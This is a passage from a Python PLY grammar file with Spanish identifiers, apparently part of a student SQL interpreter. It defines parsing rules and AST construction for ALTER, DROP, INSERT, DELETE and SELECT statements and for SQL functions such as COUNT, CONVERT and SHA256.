reporte_gramatical.append('<P_OPERACION_ALTERDB> ::= "OWNER" "TO" "ID" <P_TIPOS_OWNER>')
ret = Retorno(AlterDBOwner(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_tAlterOpDB1(t):
'P_OPERACION_ALTERDB : MODE TO NUMERO'
global reporte_gramatical
reporte_gramatical.append('<P_OPERACION_ALTERDB> ::= "MODE" "TO" "NUMERO"')
ret = Retorno(AlterDBMode(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tAlterOpDB2(t):
'P_OPERACION_ALTERDB : RENAME TO CADENA'
global reporte_gramatical
reporte_gramatical.append('<P_OPERACION_ALTERDB> ::= "RENAME" "TO" "CADENA"')
ret = Retorno(AlterDBRename(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_TipoOwner(t):
'P_TIPOS_OWNER : CADENA'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "CADENA"')
t[0] = t[1]
def p_TipoOwner1(t):
'P_TIPOS_OWNER : CURRENT_USER'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "CURRENT_USER"')
t[0] = t[1]
def p_TipoOwner2(t):
'P_TIPOS_OWNER : SESSION_USER'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "SESSION_USER"')
t[0] = t[1]
def p_TipoOwner3(t):
'P_TIPOS_OWNER : ID'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "ID"')
t[0] = t[1]
# END ALTER DATABASE
# DROP TABLE
def p_dropTB(t):
'I_DROP : DROP TABLE ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DROP> ::= "DROP" "TABLE" "ID" ";" ')
ret = Retorno(DropT(t[3]),NodoAST("DROP"))
ret.getNodo().setHijo(NodoAST("TABLE"))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
# END DROP TABLE
# DROP DATABASE
def p_dropDB(t):
'I_DROP : DROP DATABASE IF EXISTS ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DROP> ::= "DROP" "DATABASE" "IF" "EXISTS" "ID" ";" ')
ret = Retorno(IfExist1(t[5],True),NodoAST("DROP"))
ret.getNodo().setHijo(NodoAST("DATABASE"))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_DropDBid(t):
'I_DROP : DROP DATABASE ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DROP> ::= "DROP" "DATABASE" "ID" ";" ')
ret = Retorno(IfExist1(t[3],False),NodoAST("DROP"))
ret.getNodo().setHijo(NodoAST("DATABASE"))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
# END DROP DATABASE
def p_AlterDB(t):
'I_ALTERDB : DATABASE ID I_OPALTERDB I_VALALTDB PCOMA'
def p_opAlterDB(t):
'I_OPALTERDB : RENAME TO'
def p_opAlterDB2(t):
'I_OPALTERDB : OWNER TO'
def p_valAlterDb(t):
'I_VALALTDB : ID'
def p_valAlterDb1(t):
'I_VALALTDB : CADENA'
# INSERT
def p_insertTB(t):
'I_INSERT : INSERT INTO ID VALUES PABRE I_LVALT PCIERRA PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_INSERT> ::= "INSERT" "INTO" "ID" "VALUES" "(" <I_LVALT> ")" ";" ')
ret = Retorno(Insert(t[3],None,t[6].getInstruccion()),NodoAST("INSERT"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[6].getNodo())
t[0] = ret
def p_insertTB1(t):
'I_INSERT : INSERT INTO ID PABRE I_LVALT PCIERRA VALUES PABRE I_LVALT PCIERRA PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_INSERT> ::= "INSERT" "INTO" "ID" "(" <I_LVALT> ")" "VALUES "(" <I_LVARLT> ")" ";" ')
ret = Retorno(Insert(t[3],t[5].getInstruccion(),t[9].getInstruccion()),NodoAST("INSERT"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_lValt(t):
'I_LVALT : I_LVALT COMA I_VALTAB'
global reporte_gramatical
reporte_gramatical.append('<L_LVALT> ::= <I_LVALT> "," <I_VALTAB>')
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_lValt1(t):
'I_LVALT : I_VALTAB'
global reporte_gramatical
reporte_gramatical.append('<L_LVALT> ::= <I_VALTAB>')
val = [t[1].getInstruccion()]
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_valTab(t):
'I_VALTAB : CONDICION'
global reporte_gramatical
reporte_gramatical.append('<I_VALTAB> ::= <CONDICION>')
t[0] = t[1]
def p_valTabMd51(t):
'I_VALTAB : MD5 PABRE CADENA PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_VALTAB> ::= "MD5" "(" "CADENA" ")"')
ret = Retorno(Md5(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
# END INSERT
def p_update(t):
'I_UPDATE : UPDATE ID SET I_LUPDATE PWHERE PCOMA'
def p_lUpdate(t):
'I_LUPDATE : I_LUPDATE COMA I_VALUPDATE'
def p_lUpdate1(t):
'I_LUPDATE : I_VALUPDATE'
def p_valUpdate(t):
'I_VALUPDATE : CONDICION'
# SHOW
def p_show(t):
'I_SHOW : SHOW DATABASES PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_SHOW> ::= "SHOW" "DATABASE" ";" ')
ret = Retorno(Show(t[2]),NodoAST("SHOW"))
#ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
# END SHOW
# DELETE
def p_delete(t):
'I_DELETE : DELETE FROM ID PWHERE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DELETE> ::= "DELETE" "FROM" "ID" <PWHERE> ";" ')
ret = Retorno(DeleteFrom(t[3],t[4].getInstruccion()),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
# END DELETE
#--------------------------------------------------------------------------------
def p_ISelect(t):
'I_SELECT : SELECT VALORES PFROM LCOMPLEMENTOS'
    # MINIMAL SELECT CLASS
def p_ISelect2(t):
'I_SELECT : SELECT VALORES PFROM PWHERE LCOMPLEMENTOS'
    # SELECT WITH WHERE INSTRUCTION
def p_ISelect3(t):
'I_SELECT : SELECT VALORES PFROM PWHERE'
    # SELECT WITH WHERE INSTRUCTION
def p_ISelect4(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM LCOMPLEMENTOS'
    # SELECT DISTINCT INSTRUCTION
def p_ISelect6(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM PWHERE LCOMPLEMENTOS'
    # SELECT DISTINCT WITH WHERE INSTRUCTION
def p_ISelect7(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM PWHERE'
    # SELECT DISTINCT WITH WHERE INSTRUCTION
def p_ISelect5(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM'
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" \"DISTINCT\" <VALORES> <PFROM>")
if isinstance(t[3], str):
ret = Retorno(Select(t[3],t[4].getInstruccion(),None,None,True),NodoAST("SELECT"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
else:
        ret = Retorno(Select3(t[3].getInstruccion(), t[4].getInstruccion(), None, None, True), NodoAST("SELECT"))  # DISTINCT production, so the distinct flag is True
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ISelect1(t):
'I_SELECT : SELECT VALORES PFROM'
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" <VALORES> <PFROM>")
if isinstance(t[2], str):
ret = Retorno(Select3(t[2],t[3].getInstruccion(),None,None,False),NodoAST("SELECT"))
ret.getNodo().setHijo(NodoAST(t[2]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
else:
ret = Retorno(Select3(t[2].getInstruccion(), t[3].getInstruccion(), None, None, False), NodoAST("SELECT"))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ISelect8(t):
'I_SELECT : SELECT VALORES'
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" <VALORES>")
if isinstance(t[2], str):
ret = Retorno(Select3(t[2],None,None,None,False),NodoAST("SELECT"))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
else:
ret = Retorno(Select3(t[2].getInstruccion(), None, None, None, False), NodoAST("SELECT"))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ISelect9(t):
'I_SELECT : SELECT DISTINCT VALORES '
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" \"DISTINCT\" <VALORES>")
    # In this production (SELECT DISTINCT VALORES) the value list is t[3]; t[2] is the DISTINCT token
    if isinstance(t[3], str):
        ret = Retorno(Select3(t[3], None, None, None, True), NodoAST("SELECT"))
        ret.getNodo().setHijo(NodoAST(t[3]))
        t[0] = ret
    else:
        ret = Retorno(Select3(t[3].getInstruccion(), None, None, None, True), NodoAST("SELECT"))
        ret.getNodo().setHijo(t[3].getNodo())
        t[0] = ret
def p_LComplementoS(t):
'LCOMPLEMENTOS : LCOMPLEMENTOS COMPLEMENTO '
def p_LComplementoS1(t):
'LCOMPLEMENTOS : COMPLEMENTO '
def p_ComplementoH(t):
'COMPLEMENTO : PGROUPBY'
def p_ComplementoHa(t):
'COMPLEMENTO : PHAVING'
def p_ComplementoO(t):
'COMPLEMENTO : PORDERBY '
def p_ComplementoL(t):
'COMPLEMENTO : PLIMIT '
def p_ComplementoSelectUnion(t):
'COMPLEMENTOSELECT : UNION I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"UNION\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectUnion(t[2].getInstruccion()), t[2].getNodo())
t[0] = ret
def p_ComplementoSelectUnionAll(t):
'COMPLEMENTOSELECT : UNION ALL I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"UNION\" \"ALL\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectUnionAll(t[3].getInstruccion()), t[3].getNodo())
t[0] = ret
def p_ComplementoSelectIntersect(t):
'COMPLEMENTOSELECT : INTERSECT I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"INTERSECT\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectIntersect(t[2].getInstruccion()), t[2].getNodo())
t[0] = ret
def p_ComplementoSelectIntersectALL(t):
'COMPLEMENTOSELECT : INTERSECT ALL I_SELECT PCOMA '
    global reporte_gramatical
    reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"INTERSECT\" \"ALL\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectIntersectALL(t[3].getInstruccion()), t[3].getNodo())
t[0] = ret
def p_ComplementoSelectExcept(t):
'COMPLEMENTOSELECT : EXCEPT I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"EXCEPT\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectExcept(t[2].getInstruccion()), t[2].getNodo())
t[0] = ret
def p_ComplementoSelectExceptAll(t):
'COMPLEMENTOSELECT : EXCEPT ALL I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"EXCEPT\" \"ALL\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectExceptAll(t[3].getInstruccion()), t[3].getNodo())
t[0] = ret
def p_ComplementoSelectExceptPcoma(t):
'COMPLEMENTOSELECT : PCOMA '
    # COMPLEMENTOSELECT reduced to a bare ";"
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \";\"")
t[0] = None
def p_Limit(t):
'PLIMIT : LIMIT CONDICION '
def p_LimitOff(t):
'PLIMIT : LIMIT CONDICION OFFSET CONDICION '
def p_OrderBy(t):
'PORDERBY : ORDER BY LCOMPLEMENTOORDERBY '
def p_ComplementoOrderL(t):
'LCOMPLEMENTOORDERBY : LCOMPLEMENTOORDERBY COMA COMPLEMENTOORDERBY '
def p_ComplementoOrderL1(t):
'LCOMPLEMENTOORDERBY : COMPLEMENTOORDERBY '
def p_ComplementoOrderCI(t):
'COMPLEMENTOORDERBY : CONDICION COMPLEMENTOORDERBY1 '
def p_ComplementoOrderCOBC(t):
'COMPLEMENTOORDERBY1 : COMPLEMENTOORDER '
def p_ComplementoOrder(t):
'COMPLEMENTOORDER : ASC '
def p_ComplementoOD(t):
'COMPLEMENTOORDER : DESC '
def p_ComplementoOANF(t):
'COMPLEMENTOORDER : ASC NULLS FIRST '
def p_ComplementoOANL(t):
'COMPLEMENTOORDER : ASC NULLS LAST '
def p_ComplementoODNF(t):
'COMPLEMENTOORDER : DESC NULLS FIRST '
def p_ComplementoODNL(t):
'COMPLEMENTOORDER : DESC NULLS LAST '
def p_ComplementoEm(t):
'COMPLEMENTOORDER : EMPTY '
def p_Having(t):
'PHAVING : HAVING CONDICION '
def p_GroupBy(t):
'PGROUPBY : GROUP BY LCOMPLEMENTOGROUP '
def p_ComplementoGroupL(t):
'LCOMPLEMENTOGROUP : LCOMPLEMENTOGROUP COMA COMPLEMENTOGROUP '
def p_ComplementoGroupLS(t):
'LCOMPLEMENTOGROUP : COMPLEMENTOGROUP '
def p_ComplementoGroupC(t):
'COMPLEMENTOGROUP : CONDICION '
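# NOTE: the complement productions above (LCOMPLEMENTOS, GROUP BY, HAVING,
# ORDER BY and LIMIT/OFFSET) are syntax-only: they attach no semantic action,
# so t[0] is left as None for each of them.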
def p_Valores(t):
'VALORES : POR '
global reporte_gramatical
reporte_gramatical.append("<VALORES> ::= *")
t[0] = t[1]
def p_ValoresLista(t):
'VALORES : LISTAVALORES '
global reporte_gramatical
reporte_gramatical.append("<VALORES> ::= <LISTAVALORES>")
t[0] = t[1]
def p_ListaValores(t):
'LISTAVALORES : LISTAVALORES COMA VALOR '
global reporte_gramatical
reporte_gramatical.append("<LISTAVALORES> ::= <LISTAVALORES> \",\" <VALOR>")
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ListaValoresS(t):
'LISTAVALORES : VALOR '
global reporte_gramatical
reporte_gramatical.append("<LISTAVALORES> ::= <VALOR>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_ValorSub(t):
'VALOR : PABRE SUBCONSULTA PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"(\" <SUBCONSULTA> \")\" <ALIAS>")
ret = Retorno(Subconsulta(t[2].getInstruccion(), t[4].getInstruccion()), NodoAST("AS"))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorCountAa(t):
'VALOR : COUNT PABRE POR PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"*\" \")\" <ALIAS>")
ret = Retorno(FuncionAgregacion('COUNT', None, t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorCounta(t):
'VALOR : COUNT PABRE ID PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \")\" <ALIAS>")
val_id = Id(t[3], None)
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorCountA(t):
'VALOR : COUNT PABRE POR PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"*\" \")\"")
ret = Retorno(FuncionAgregacion('COUNT', None, t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
t[0] = ret
def p_ValorCount(t):
'VALOR : COUNT PABRE ID PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \")\"")
val_id = Id(t[3], None)
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_ValorCountAliasId(t):
'VALOR : COUNT PABRE ID PUNTO ID PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \".\" \"ID\" \")\" <ALIAS>")
val_id = Id(t[5], t[3])
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
    ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorCountIdP(t):
'VALOR : COUNT PABRE ID PUNTO ID PCIERRA'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \".\" \"ID\" \")\"")
    val_id = Id(t[5], t[3])
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
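# Illustrative select-list items covered by the COUNT rules above (assumed
# examples, for documentation only): COUNT(*), COUNT(*) AS total, COUNT(col),
# COUNT(tabla.col) and COUNT(tabla.col) AS total.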
def p_ValorCondicionAlias(t):
'VALOR : CONDICION ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <CONDICION> <ALIAS>")
ret = Retorno(Valores(t[1].getInstruccion(), t[2].getInstruccion()), NodoAST('AS'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ValorCondicion(t):
'VALOR : CONDICION'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <CONDICION>")
ret = Retorno(Valores(t[1].getInstruccion(), None), t[1].getNodo())
t[0] = ret
def p_ValorFTrigonometricas(t):
'VALOR : FTRIGONOMETRICAS PABRE LNUM PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <FTRIGONOMETRICAS> \"(\" <LNUM> \")\"")
ret = Retorno(FuncionesTrigonometricas(t[1], t[3].getInstruccion(), t[1]), NodoAST('TRIGONOMETRICA'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorFTrigonometricasAlias(t):
'VALOR : FTRIGONOMETRICAS PABRE LNUM PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <FTRIGONOMETRICAS> \"(\" <LNUM> \")\" <ALIAS>")
ret = Retorno(FuncionesTrigonometricas(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('TRIGONOMETRICA'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorGreatest(t):
'VALOR : GREATEST PABRE LNUM PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GREATEST\" \"(\" <LNUM> \")\"")
ret = Retorno(FuncionGreatest(t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GREATEST'))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorLeast(t):
'VALOR : LEAST PABRE LNUM PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"LEAST\" \"(\" <LNUM> \")\"")
ret = Retorno(FuncionLeast(t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('LEAST'))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorGreatestAlias(t):
'VALOR : GREATEST PABRE LNUM PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GREATEST\" \"(\" <LNUM> \")\" <ALIAS>")
ret = Retorno(FuncionGreatest(t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GREATEST'))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorLeastAlias(t):
'VALOR : LEAST PABRE LNUM PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"LEAST\" \"(\" <LNUM> \")\" <ALIAS>")
ret = Retorno(FuncionLeast(t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('LEAST'))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0]= ret
def p_ValorRandomA(t):
'VALOR : RANDOM PABRE PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"RANDOM\" \"(\" \")\" <ALIAS>")
ret = Retorno(FuncionRandom(t[4].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('RANDOM'))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorRandom(t):
'VALOR : RANDOM PABRE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"RANDOM\" \"(\" \")\"")
ret = Retorno(FuncionRandom(t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('RANDOM'))
t[0] = ret
def p_ValorPiAlias(t):
'VALOR : PI PABRE PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"PI\" \"(\" \")\" <ALIAS>")
ret = Retorno(FuncionPi(t[4].getInstruccion()), NodoAST('FUNCION'))
    ret.getNodo().setHijo(NodoAST('PI'))
    ret.getNodo().setHijo(t[4].getNodo())
    t[0] = ret
def p_ValorPi(t):
'VALOR : PI PABRE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"PI\" \"(\" \")\"")
ret = Retorno(FuncionPi(t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('PI'))
t[0] = ret
def p_ValorFuncionesDecodeA(t):
'VALOR : DECODE PABRE CADENA COMA CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"DECODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\" <ALIAS>")
    ret = Retorno(Decode(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('DECODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesDecode(t):
'VALOR : DECODE PABRE CADENA COMA CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"DECODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\"")
ret = Retorno(Decode(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('DECODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesEncodeA(t):
'VALOR : ENCODE PABRE CADENA COMA CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"ENCODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(Encode(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('ENCODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesEncode(t):
'VALOR : ENCODE PABRE CADENA COMA CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"ENCODE\" \"(\" \"CADENA\" \",\" \"CADENA\" \")\"")
ret = Retorno(Encode(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('ENCODE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesConvertDate(t):
'VALOR : CONVERT PABRE CADENA AS DATE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"DATE\" \")\"")
ret = Retorno(Convert(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesConvertInt(t):
'VALOR : CONVERT PABRE CADENA AS INTEGER PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"INTEGER\" \")\"")
ret = Retorno(Convert(t[3], t[5], t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesConvertDateA(t):
'VALOR : CONVERT PABRE CADENA AS DATE PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"DATE\" \")\" <ALIAS>")
ret = Retorno(Convert(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
    ret.getNodo().setHijo(NodoAST(t[5]))
    ret.getNodo().setHijo(t[7].getNodo())
    t[0] = ret
def p_ValorFuncionesConvertIntA(t):
'VALOR : CONVERT PABRE CADENA AS INTEGER PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CONVERT\" \"(\" \"CADENA\" \"AS\" \"INTEGER\" \")\" <ALIAS>")
ret = Retorno(Convert(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('CONVERT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesSha(t):
'VALOR : SHA256 PABRE CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SHA256\" \"(\" \"CADENA\" \")\"")
ret = Retorno(Sha256(t[3], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SHA256'))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_ValorFuncionesShaA(t):
'VALOR : SHA256 PABRE CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SHA256\" \"(\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(Sha256(t[3], t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SHA256'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorOperadorMatAlias(t):
'VALOR : NUM OPERADOR NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <NUM> <OPERADOR> <NUM> <ALIAS>")
val = OperacionBinariaS(t[1], t[3], t[2], t[4].getInstruccion())
nodo = None
if t[2] == OPERACION_STRING.BAND:
nodo = NodoAST('&')
elif t[2] == OPERACION_STRING.BOR:
nodo = NodoAST('\\|')
elif t[2] == OPERACION_STRING.BXOR:
nodo = NodoAST('#')
elif t[2] == OPERACION_STRING.DESPLAZAI:
nodo = NodoAST('\\<\\<')
elif t[2] == OPERACION_STRING.DESPLAZAD:
nodo = NodoAST('\\>\\>')
ret = Retorno(val, nodo)
ret.getNodo().setHijo(NodoAST(str(t[1].valor)))
ret.getNodo().setHijo(NodoAST(str(t[3].valor)))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorOperadorMat(t):
'VALOR : NUM OPERADOR NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <NUM> <OPERADOR> <NUM>")
val = OperacionBinariaS(t[1], t[3], t[2], None)
nodo = None
if t[2] == OPERACION_STRING.BAND:
nodo = NodoAST('&')
elif t[2] == OPERACION_STRING.BOR:
nodo = NodoAST('\\|')
